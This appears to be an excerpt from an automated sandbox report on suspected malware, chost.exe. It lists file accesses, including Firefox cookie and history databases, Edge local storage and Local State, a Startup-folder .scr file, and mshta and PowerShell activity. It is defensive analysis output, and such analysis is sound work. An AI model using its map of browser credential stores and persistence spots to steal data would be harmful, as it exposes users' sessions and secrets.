Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI43362\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\chost.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\Desktop\BPMLNOBVSB.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\Desktop\BPMLNOBVSB.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\Desktop\BPMLNOBVSB.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\Desktop\BPMLNOBVSB.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\? ? \Common Files\Desktop\BPMLNOBVSB.png VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Queries volume information: C:\Users\user\Desktop\BPMLNOBVSB.png VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
